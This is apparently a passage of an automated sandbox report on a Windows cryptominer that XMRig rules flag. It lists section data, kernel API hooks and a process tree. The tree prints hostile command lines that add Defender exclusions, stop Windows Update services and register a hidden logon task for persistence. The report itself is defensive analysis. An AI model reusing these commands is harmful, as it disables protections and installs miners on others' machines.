                                      .pdata  0x9c4000         0x1230        0x1400     False     0.4341796875         data       4.865236906764568   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .xdata  0x9c6000         0xf44         0x1000     False     0.241455078125       data       4.036582842306508   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .bss    0x9c7000         0x28e0        0x0        False     0                    empty      0.0                 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata  0x9ca000         0xa34         0xc00      False     0.3046875            data       3.8892775409781057  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .CRT    0x9cb000         0x60          0x200      False     0.06640625           data       0.3085875245953951  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .tls    0x9cc000         0x10          0x200      False     0.02734375           data       0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc   0x9cd000         0xa80         0xc00      False     0.3518880208333333   data       4.0923733872388315  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .reloc  0x9ce000         0x330         0x400      False     0.5712890625         data       4.774016362476347   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      Name           RVA       Size   Type                                                           Language  Country
                                      RT_ICON        0x9cd130  0x2e8  Device independent bitmap graphic, 32 x 64 x 4, image size 0  English   United States
                                      RT_GROUP_ICON  0x9cd418  0x14   data                                                           English   United States
                                      RT_VERSION     0x9cd430  0x324  data                                                           English   United States
                                      RT_MANIFEST    0x9cd758  0x325  XML 1.0 document, ASCII text                                   English   United States
                                      DLL           Import
                                      KERNEL32.dll  CloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, GetCurrentThreadId, GetLastError, GetStartupInfoA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSemaphore, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte
                                      msvcrt.dll    __C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, fputc, fputs, fputwc, free, fwprintf, fwrite, localeconv, malloc, memcpy, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                      Language of compilation system  Country where language is spoken  Map
                                      English                         United States
                                      No network behavior found

                                      Code Manipulations

                                      Function Name                  Hook Type  Active in Processes
                                      ZwEnumerateKey                 INLINE     winlogon.exe, explorer.exe
                                      NtQuerySystemInformation       INLINE     winlogon.exe, explorer.exe
                                      ZwResumeThread                 INLINE     winlogon.exe, explorer.exe
                                      NtDeviceIoControlFile          INLINE     winlogon.exe, explorer.exe
                                      ZwDeviceIoControlFile          INLINE     winlogon.exe, explorer.exe
                                      NtEnumerateKey                 INLINE     winlogon.exe, explorer.exe
                                      NtQueryDirectoryFile           INLINE     winlogon.exe, explorer.exe
                                      ZwEnumerateValueKey            INLINE     winlogon.exe, explorer.exe
                                      ZwQuerySystemInformation       INLINE     winlogon.exe, explorer.exe
                                      NtResumeThread                 INLINE     winlogon.exe, explorer.exe
                                      RtlGetNativeSystemInformation  INLINE     winlogon.exe, explorer.exe
                                      NtQueryDirectoryFileEx         INLINE     winlogon.exe, explorer.exe
                                      NtEnumerateValueKey            INLINE     winlogon.exe, explorer.exe
                                      ZwQueryDirectoryFileEx         INLINE     winlogon.exe, explorer.exe
                                      ZwQueryDirectoryFile           INLINE     winlogon.exe, explorer.exe
                                      Function Name                  Hook Type  New Data
                                      ZwEnumerateKey                 INLINE     0xE9 0x93 0x33 0x35 0x5D 0xDF
                                      NtQuerySystemInformation       INLINE     0xE9 0x93 0x33 0x35 0x5B 0xBF
                                      ZwResumeThread                 INLINE     0xE9 0x91 0x13 0x35 0x58 0x8F
                                      NtDeviceIoControlFile          INLINE     0xE9 0x97 0x73 0x36 0x64 0x4F
                                      ZwDeviceIoControlFile          INLINE     0xE9 0x97 0x73 0x36 0x64 0x4F
                                      NtEnumerateKey                 INLINE     0xE9 0x93 0x33 0x35 0x5D 0xDF
                                      NtQueryDirectoryFile           INLINE     0xE9 0x91 0x13 0x35 0x5C 0xCF
                                      ZwEnumerateValueKey            INLINE     0xE9 0x97 0x73 0x36 0x61 0x1F
                                      ZwQuerySystemInformation       INLINE     0xE9 0x93 0x33 0x35 0x5B 0xBF
                                      NtResumeThread                 INLINE     0xE9 0x91 0x13 0x35 0x58 0x8F
                                      RtlGetNativeSystemInformation  INLINE     0xE9 0x93 0x33 0x35 0x5B 0xBF
                                      NtQueryDirectoryFileEx         INLINE     0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                                      NtEnumerateValueKey            INLINE     0xE9 0x97 0x73 0x36 0x61 0x1F
                                      ZwQueryDirectoryFileEx         INLINE     0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                                      ZwQueryDirectoryFile           INLINE     0xE9 0x91 0x13 0x35 0x5C 0xCF
                                      Target ID:0
                                      Start time:13:29:07
                                      Start date:09/06/2023
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\Desktop\file.exe
                                      Imagebase:0x7ff66b520000
                                      File size:10264640 bytes
                                      MD5 hash:EEE7B971E0B76A0DF56BDAC2AC2FA343
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      Target ID:1
                                      Start time:13:29:09
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                      Imagebase:0x7ff7466a0000
                                      File size:447488 bytes
                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:high

                                      Target ID:2
                                      Start time:13:29:09
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6da640000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:4
                                      Start time:13:29:22
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                      Imagebase:0x7ff7cb270000
                                      File size:273920 bytes
                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:5
                                      Start time:13:29:22
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6da640000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:6
                                      Start time:13:29:22
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop UsoSvc
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Target ID:7
                                      Start time:13:29:23
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop WaaSMedicSvc
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:8
                                      Start time:13:29:23
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop wuauserv
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:9
                                      Start time:13:29:23
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop bits
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:10
                                      Start time:13:29:24
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop dosvc
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:11
                                      Start time:13:29:25
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\dialer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\dialer.exe
                                      Imagebase:0x7ff60f5c0000
                                      File size:36864 bytes
                                      MD5 hash:0EC74656A7F7667DD94C76081B111827
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:12
                                      Start time:13:29:25
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iejbryoj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'sethc' -RunLevel 'Highest' -Force; }
                                      Imagebase:0x7ff7466a0000
                                      File size:447488 bytes
                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:13
                                      Start time:13:29:25
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6da640000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:14
                                      Start time:13:29:26
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\winlogon.exe
                                      Wow64 process (32bit):false
                                      Commandline:winlogon.exe
                                      Imagebase:0x7ff6b23f0000
                                      File size:677376 bytes
                                      MD5 hash:F9017F2DC455AD373DF036F5817A8870
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:15
                                      Start time:13:29:26
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\lsass.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\lsass.exe
                                      Imagebase:0x7ff6c5470000
                                      File size:57976 bytes
                                      MD5 hash:317340CD278A374BCEF6A30194557227
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:16
                                      Start time:13:29:28
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:17
                                      Start time:13:29:28
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:18
                                      Start time:13:29:28
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\dwm.exe
                                      Wow64 process (32bit):false
                                      Commandline:dwm.exe
                                      Imagebase:0x7ff66aed0000
                                      File size:62464 bytes
                                      MD5 hash:70073A05B2B43FFB7A625708BB29E7C7
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:19
                                      Start time:13:29:39
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\wbem\WMIADAP.exe
                                      Wow64 process (32bit):false
                                      Commandline:wmiadap.exe /F /T /R
                                      Imagebase:0x7ff639610000
                                      File size:177664 bytes
                                      MD5 hash:9783D0765F31980950445DFD40DB15DA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:20
                                      Start time:13:29:46
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:21
                                      Start time:13:29:46
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:22
                                      Start time:13:29:47
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:23
                                      Start time:13:29:48
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000017.00000003.708438407.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000017.00000003.585943996.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000017.00000002.772856939.000001FDE6010000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000017.00000000.562936177.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000017.00000002.770922577.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000017.00000003.679943242.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000017.00000003.650224694.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security

                                      Target ID:24
                                      Start time:13:29:50
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:25
                                      Start time:13:29:50
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:26
                                      Start time:13:29:51
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:27
                                      Start time:13:29:55
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Themes
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:28
                                      Start time:13:29:56
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s EventSystem
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:31
                                      Start time:13:29:57
                                      Start date:09/06/2023
                                      Path:C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
                                      Imagebase:0x7ff652aa0000
                                      File size:10264640 bytes
                                      MD5 hash:EEE7B971E0B76A0DF56BDAC2AC2FA343
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000002.617274824.00007FF652E22000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001F.00000002.617274824.00007FF652E22000.00000004.00000001.01000000.00000007.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000002.617274824.00007FF652ABC000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 41%, ReversingLabs

                                      Target ID:32
                                      Start time:13:29:57
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:33
                                      Start time:13:29:58
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:34
                                      Start time:13:29:59
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k appmodel -p -s camsvc
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:35
                                      Start time:13:30:00
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s AudioEndpointBuilder
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:36
                                      Start time:13:30:03
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s FontCache
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:37
                                      Start time:13:30:04
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:38
                                      Start time:13:30:04
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                      Imagebase:0x7ff7466a0000
                                      File size:447488 bytes
                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:39
                                      Start time:13:30:04
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6da640000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:40
                                      Start time:13:30:05
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s nsi
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:41
                                      Start time:13:30:06
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:42
                                      Start time:13:30:06
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:43
                                      Start time:13:30:08
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                      Imagebase:0x7ff7cb270000
                                      File size:273920 bytes
                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:44
                                      Start time:13:30:08
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6da640000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:45
                                      Start time:13:30:08
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:46
                                      Start time:13:30:08
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop UsoSvc
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:47
                                      Start time:13:30:08
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop WaaSMedicSvc
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:48
                                      Start time:13:30:09
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc stop wuauserv
                                      Imagebase:0x7ff6a9a90000
                                      File size:69120 bytes
                                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:49
                                      Start time:13:30:09
                                      Start date:09/06/2023
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s Dhcp
                                      Imagebase:0x7ff603c50000
                                      File size:51288 bytes
                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                      Has elevated privileges:false
